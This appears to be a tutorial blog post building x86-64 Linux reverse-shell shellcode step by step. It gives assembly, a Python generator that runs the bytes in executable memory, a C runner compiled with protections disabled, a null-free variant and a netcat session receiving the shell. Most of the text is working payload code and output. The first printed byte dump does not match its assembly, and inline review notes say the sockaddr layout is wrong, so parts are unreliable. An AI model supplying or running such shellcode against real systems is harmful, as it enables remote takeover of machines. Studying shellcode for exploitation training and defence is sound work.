Previously, we looked at generating execve shellcode. In this article, we will be extending that code to create reverse shell shellcode.
Five steps are needed to do this:
Create a Socket
Create a Sockaddr Struct
Call Connect
Handle Duplication
Call Execve
To call external functions, we will be using syscalls. A syscall is a mechanism that allows a program to request services from the operating system kernel.
Create a Socket
Below is the socket function's signature, along with the relevant parameters we need to set.
int socket( // Syscall number 41 -> RAX = 41
int domain, // Address family, AF_INET for IPv4 -> RDI = 2
int type, // Socket type, SOCK_STREAM for TCP -> RSI = 1
int protocol // Zero selects the default protocol -> RDX = 0
);
The following ASM code will make the system call, and save the socket descriptor to the RDI register.
// Create a socket: socket(AF_INET, SOCK_STREAM, 0)
mov rax, 41 // Syscall number for socket
mov rdi, 2 // domain = AF_INET
mov rsi, 1 // type = SOCK_STREAM
xor rdx, rdx // protocol = 0
syscall // Make our socket syscall, the result comes back in RAX
mov rdi, rax // Save the socket file descriptor in RDI, where connect takes its sockfd argument
Create a Sockaddr Struct
Next, we need to convert the IP address and port we want to connect to into network byte order. This can be done with the following code.
import socket
import struct
# Listener the shellcode should connect back to.
ip_address = "127.0.0.1"
port = 4444
family = socket.AF_INET

# Bytes exactly as they must sit in memory inside struct sockaddr_in:
# the address and the port are in network (big-endian) byte order, while the
# family field is a plain 16-bit integer in the target's own byte order.
# The target is x86-64, so that is little-endian. The byte orders are spelled
# out with struct instead of socket.htons(), whose result depends on the
# machine running this script rather than on the machine running the shellcode.
ip_network_order = socket.inet_aton(ip_address)
sockaddr_head = struct.pack("<H", family) + struct.pack("!H", port)

# x86-64 stores immediates little-endian, so the constant to write in the
# assembly is the in-memory image read back to front.
reversed_ip = ip_network_order[::-1].hex()
print(f"IP Address: 0x{reversed_ip}")
reversed_port_family = sockaddr_head[::-1]
print(f"Port + Family: 0x{reversed_port_family.hex()}")
Running this code will give us the values we need for the Sockaddr struct:
python3 convert_ip.py
IP Address: 0x0100007f
Port + Family: 0x5c110002
We push these values to the stack, and load a pointer to the resulting struct into the RSI register.
// Push sockaddr structure to stack
push 0x0100007f // IP address bytes 7f 00 00 01 (127.0.0.1), pushed as a sign-extended 8-byte value
mov rax, 0x5c110002 // Family (AF_INET = 2) in the low 16 bits, port 4444 (bytes 11 5c) in the next 16
push rax // Pushed last, so these 8 bytes sit at the lowest address, the start of the struct
mov rsi, rsp // Load address of sockaddr into RSI
// NOTE(review): in 64-bit mode each push stores 8 bytes, so the IP bytes end
// up at offset 8 of the struct and bytes 4-7, where struct sockaddr_in keeps
// sin_addr, are zero. connect is therefore asked for 0.0.0.0:4444, which Linux
// appears to treat as the local host - that would explain why the 127.0.0.1
// demo still connects. For any other address the family, port and IP
// presumably have to be packed into one 8-byte value (0x0100007f5c110002 for
// this example) - TODO confirm and regenerate the shellcode dumps.
Call Connect
The connect function takes the socket file descriptor we created earlier, a pointer to the sockaddr struct, and the length of that struct.
int connect( // Syscall number 42 -> RAX = 42
int sockfd, // RDI = the socket file descriptor created in step 1 (an integer, not a pointer)
const struct sockaddr *addr, // RSI = Pointer to the sockaddr struct we created in step 2
socklen_t addrlen // RDX = The length of our sockaddr structure (16)
);
We can call connect using the following ASM code.
// Call connect(); RDI (socket descriptor) and RSI (sockaddr pointer) were loaded in the earlier steps
mov rdx, 16 // addrlen = length of sockaddr
mov rax, 42 // Syscall number for connect
syscall // Perform connect syscall
At this point, the code should successfully connect back to us.
Handle Duplication
Next, we use dup2 to duplicate our socket file descriptor onto the stdin, stdout and stderr descriptors (0, 1 and 2). This will ensure any IO is redirected over our network socket.
int dup2( // Syscall number 33 -> RAX = 33
int oldfd, // Our existing socket file descriptor
int newfd // Descriptor to replace: STDIN (0), STDOUT (1), STDERR (2)
);
We can implement this using a simple loop.
// Redirect stdin, stdout, stderr to the socket
mov rsi, 0 // newfd starts at 0 (stdin)
dup_loop:
mov rax, 33 // Syscall number for dup2, reloaded on every pass because the syscall returns its result in RAX
syscall // Duplicate socket file descriptor (oldfd is whatever RDI holds, newfd is RSI)
inc rsi // Increment rsi (0 -> 1 -> 2)
cmp rsi, 3 // Check if all descriptors are redirected
jne dup_loop // Repeat until stdin, stdout, stderr are done
Call Execve
Finally, we can call execve to replace the current process with /bin/sh. Given our STDIN/STDOUT/STDERR are already redirected to the network socket, this will yield a shell!
// Call execve with path /bin//sh, a NULL argument vector and a NULL environment
xor rsi,rsi // Zero RSI (argument vector). Also supplies the zero value pushed next.
push rsi // Push 8 zero bytes, they terminate the string pushed on top of them
mov rdi,0x68732f2f6e69622f // The 8 bytes of /bin//sh as a little-endian value
push rdi // Push the /bin//sh string to the stack
push rsp // Push stack pointer to the stack. This now points to the /bin//sh string
pop rdi // Pop the pointer to the /bin//sh string back into RDI
xor rdx,rdx // Zero RDX (environment vector)
push 59 // Syscall number for execve onto the stack
pop rax // Syscall number into RAX
syscall // make our execve system call
Putting it all Together
The following Python code will generate our shellcode. Note that when running the code in GDB, you may need to exit GDB before the shell spawns properly.
import keystone
import mmap
import ctypes
import os
import sys
import time
import threading
import subprocess
# Reverse-shell assembly (Intel syntax), handed to Keystone unchanged. The
# leading int3 is only a debugging aid and is dropped from the printed output.
# NOTE(review): both pushes that build the sockaddr store 8 bytes, so the IP
# bytes land at offset 8 and the sin_addr field (offset 4) is zero. The code
# presumably connects to 0.0.0.0, which Linux appears to treat as the local
# host - confirm before pointing this at any address other than 127.0.0.1.
asm_code = """
int3 // Software breakpoint. Leave this here. It will be removed from the printed output.
// Create a socket
mov rax, 41 // Syscall number for socket
mov rdi, 2 // AF_INET
mov rsi, 1 // SOCK_STREAM
xor rdx, rdx // Protocol 0
syscall // Make our socket syscall
mov rdi, rax // Save the socket file descriptor
// Push socketaddr structure to stack
push 0x0100007f // IP address (127.0.0.1 in network byte order)
mov rax, 0x5c110002 // Port and family (port=4444, AF_INET)
push rax // Push the rest of sockaddr
mov rsi, rsp // Load address of sockaddr into rsi
// Call connect()
mov rdx, 16 // Length of sockaddr
mov rax, 42 // Syscall number for connect
syscall // Perform connect syscall
// Redirect stdin, stdout, stderr to the socket
mov rsi, 0 // Redirect stdin
dup_loop:
mov rax, 33 // Syscall number for dup2
syscall // Duplicate socket file descriptor
inc rsi // Increment rsi (0 -> 1 -> 2)
cmp rsi, 3 // Check if all descriptors are redirected
jne dup_loop // Repeat until stdin, stdout, stderr are done
// Call execve
xor rsi,rsi // Zero RSI (argument vector). Also acts as NULL byte.
push rsi // Push NULL byte to stack
mov rdi,0x68732f2f6e69622f // bin//sh string to RDI
push rdi // Push the /bin//sh string to the stack
push rsp // Push stack pointer to the stack. This now points to the /bin/sh string
pop rdi // Pop the pointer to the /bin/sh string back into RDI
xor rdx,rdx // Zero RDX (environment vector)
push 59 // Syscall number into RDX
pop rax // Syscall number into RDX
syscall // make our execve system call
"""

# Assemble the listing for 64-bit x86.
assembler = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64)
encoding, count = assembler.asm(asm_code)
machine_code = bytearray(encoding)
num_bytes = len(machine_code)
formatted_hex = ''.join(f'\\x{byte:02x}' for byte in machine_code)

# Print shellcode and size, without the software breakpoint: the breakpoint
# is the first byte, i.e. the first four characters of the escaped dump.
print("Shellcode: " + formatted_hex[4:])
print("Shellcode length: " + str(num_bytes-1))
input("Press any key to continue...")

# Copy the code into an anonymous page mapped readable, writable and executable.
page_size = mmap.PAGESIZE
mem = mmap.mmap(-1, page_size, prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
mem.write(machine_code)

pid = os.getpid()
print(f"Process ID: {pid}")

# Address of the first byte of the mapping. It is used both as the GDB
# breakpoint location and as the entry point of the callable below. The
# temporary ctypes view is not kept, so the mapping can be closed later.
entry_address = ctypes.addressof(ctypes.c_char.from_buffer(mem))
mem_address = hex(entry_address)
gdb_command = f"gdb -q -p {pid} -ex 'break *{mem_address}' -ex 'continue'"
mem_ptr = ctypes.CFUNCTYPE(None)(entry_address)


def execute_machine_code():
    """Wait three seconds, then call into the mapped code on this thread."""
    print("Executing machine code asynchronously...")
    time.sleep(3)
    mem_ptr()


# Start the delayed call on a worker thread, then attach GDB to this process
# from the main thread while the worker is still sleeping.
execution_thread = threading.Thread(target=execute_machine_code)
execution_thread.start()
print("Running GDB")
os.system(gdb_command)
execution_thread.join()
mem.close()
Running the code produces our shellcode:
./bin/python3 exploit.py
Shellcode: \xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48\x31\xd2\x0f\x05\x48\x89\xc7\x68\x7f\x00\x00\x01\x48\xc7\xc0\x02\x00\x11\x5c\x50\x48\x89\xe6\x48\xc7\xc2\x10\x00\x00\x00\x48\xc7\xc0\x2a\x00\x00\x00\x0f\x05\x48\xc7\xc6\x00\x00\x00\x00\x48\xc7\xc0\x21\x00\x00\x00\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\x75\xee\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x6a\x3b\x58\x0f\x05
Shellcode length: 110
Press any key to continue...
The shellcode created can be imported into a C runner for execution.
// Minimal runner: keeps the shellcode in a local buffer and calls into it.
// NOTE(review): the buffer is a local array, so running it presumably relies
// on the -z execstack flag in the compile command that follows.
int main(int argc, char **argv)
{
// Shellcode bytes as printed by the generator script
char code[] = "\xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48\x31\xd2\x0f\x05\x48\x89\xc7\x68\x7f\x00\x00\x01\x48\xc7\xc0\x02\x00\x11\x5c\x50\x48\x89\xe6\x48\xc7\xc2\x10\x00\x00\x00\x48\xc7\xc0\x2a\x00\x00\x00\x0f\x05\x48\xc7\xc6\x00\x00\x00\x00\x48\xc7\xc0\x21\x00\x00\x00\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\x75\xee\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x6a\x3b\x58\x0f\x05";
// Function pointer used to transfer control to the buffer
int (*func)();
// Treat the first byte of the buffer as the function entry point
func = (int (*)()) code;
// Call into the shellcode; its final instruction is the execve syscall
(int)(*func)();
return 0;
}
This can be compiled with:
gcc runner.c -o runner -fno-stack-protector -z execstack -no-pie
Setting up a netcat listener and executing the code, we should receive our shell.
nc -lvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 60284
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),107(bluetooth),115(scanner),127(lpadmin),135(wireshark),137(kaboxer),138(vboxsf)
Going Null Free
There are a number of modifications that need to be made to make the shellcode null free. I've implemented these below. This adds 8 bytes to the resulting shellcode.
import keystone
import mmap
import ctypes
import os
import sys
import time
import threading
import subprocess
# Null-free variant of the reverse-shell assembly (Intel syntax), handed to
# Keystone unchanged. Small constants are loaded with push/pop pairs, and the
# two sockaddr constants are produced by subtracting two null-free 64-bit
# values. The leading int3 is only a debugging aid and is dropped from the
# printed output.
# NOTE(review): both sockaddr values are pushed as 8-byte registers, so the IP
# bytes land at offset 8 and the sin_addr field (offset 4) is zero. The code
# presumably connects to 0.0.0.0, which Linux appears to treat as the local
# host - confirm before pointing this at any address other than 127.0.0.1.
asm_code = """
int3 // Software breakpoint. Leave this here. It will be removed from the printed output.
// Create a socket
//mov rax, 41 // Syscall number for socket (NULL)
push 41
pop rax
//mov rdi, 2 // AF_INET (NULL)
push 2 // null free
pop rdi // null free
//mov rsi, 1 // SOCK_STREAM (NULL)
push 1 // null free
pop rsi // null free
xor rdx, rdx // Protocol 0
syscall // Make our socket syscall
mov rdi, rax // Save the socket file descriptor
// Push socketaddr structure to stack
//push 0x0100007f // IP address (127.0.0.1 in network byte order) (NULL)
mov rax, 0x11111111ffffffff // some maths to encode the address without null bytes
mov rbx, 0x11111111FEFFFF80
sub rax, rbx
push rax
//mov rax, 0x5c110002 // Port and family (port=4444, AF_INET) (NULL)
mov rax, 0x11111111ffffffff
mov rbx, 0x11111111A3EEFFFD
sub rax, rbx
push rax // Push the rest of sockaddr
mov rsi, rsp // Load address of sockaddr into rsi
//Call connect()
//mov rdx, 16 // Length of sockaddr (NULL)
push 16
pop rdx
//mov rax, 42 // Syscall number for connect (NULL)
push 42
pop rax
syscall // Perform connect syscall
// Redirect stdin, stdout, stderr to the socket
// mov rsi, 0 // Redirect stdin (NULL)
xor rsi,rsi
dup_loop:
// mov rax, 33 // Syscall number for dup2 (NULL)
push 33
pop rax
syscall // Duplicate socket file descriptor
inc rsi // Increment rsi (0 -> 1 -> 2)
cmp rsi, 3 // Check if all descriptors are redirected
jne dup_loop // Repeat until stdin, stdout, stderr are done
// Call execve
xor rsi,rsi // Zero RSI (argument vector). Also acts as NULL byte.
push rsi // Push NULL byte to stack
mov rdi,0x68732f2f6e69622f // bin//sh string to RDI
push rdi // Push the /bin//sh string to the stack
push rsp // Push stack pointer to the stack. This now points to the /bin/sh string
pop rdi // Pop the pointer to the /bin/sh string back into RDI
xor rdx,rdx // Zero RDX (environment vector)
push 59 // Syscall number into RDX
pop rax // Syscall number into RDX
syscall // make our execve system call
"""

# Assemble the listing for 64-bit x86.
assembler = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64)
encoding, count = assembler.asm(asm_code)
machine_code = bytearray(encoding)
num_bytes = len(machine_code)
formatted_hex = ''.join(f'\\x{byte:02x}' for byte in machine_code)

# Print shellcode and size, without the software breakpoint: the breakpoint
# is the first byte, i.e. the first four characters of the escaped dump.
print("Shellcode: " + formatted_hex[4:])
print("Shellcode length: " + str(num_bytes-1))
input("Press any key to continue...")

# Copy the code into an anonymous page mapped readable, writable and executable.
page_size = mmap.PAGESIZE
mem = mmap.mmap(-1, page_size, prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
mem.write(machine_code)

pid = os.getpid()
print(f"Process ID: {pid}")

# Address of the first byte of the mapping. It is used both as the GDB
# breakpoint location and as the entry point of the callable below. The
# temporary ctypes view is not kept, so the mapping can be closed later.
entry_address = ctypes.addressof(ctypes.c_char.from_buffer(mem))
mem_address = hex(entry_address)
gdb_command = f"gdb -q -p {pid} -ex 'break *{mem_address}' -ex 'continue'"
mem_ptr = ctypes.CFUNCTYPE(None)(entry_address)


def execute_machine_code():
    """Wait three seconds, then call into the mapped code on this thread."""
    print("Executing machine code asynchronously...")
    time.sleep(3)
    mem_ptr()


# Start the delayed call on a worker thread, then attach GDB to this process
# from the main thread while the worker is still sleeping.
execution_thread = threading.Thread(target=execute_machine_code)
execution_thread.start()
print("Running GDB")
os.system(gdb_command)
execution_thread.join()
mem.close()
This produces the following shellcode.
./bin/python3 null_free.py
Shellcode: \x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\xb8\xff\xff\xff\xff\x11\x11\x11\x11\x48\xbb\x80\xff\xff\xfe\x11\x11\x11\x11\x48\x29\xd8\x50\x48\xb8\xff\xff\xff\xff\x11\x11\x11\x11\x48\xbb\xfd\xff\xee\xa3\x11\x11\x11\x11\x48\x29\xd8\x50\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\x75\xf2\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x6a\x3b\x58\x0f\x05
Shellcode length: 118
In Conclusion
The script could be modified further to include dynamic IP address and port generation, although I’ll leave that as an exercise for the reader 🙂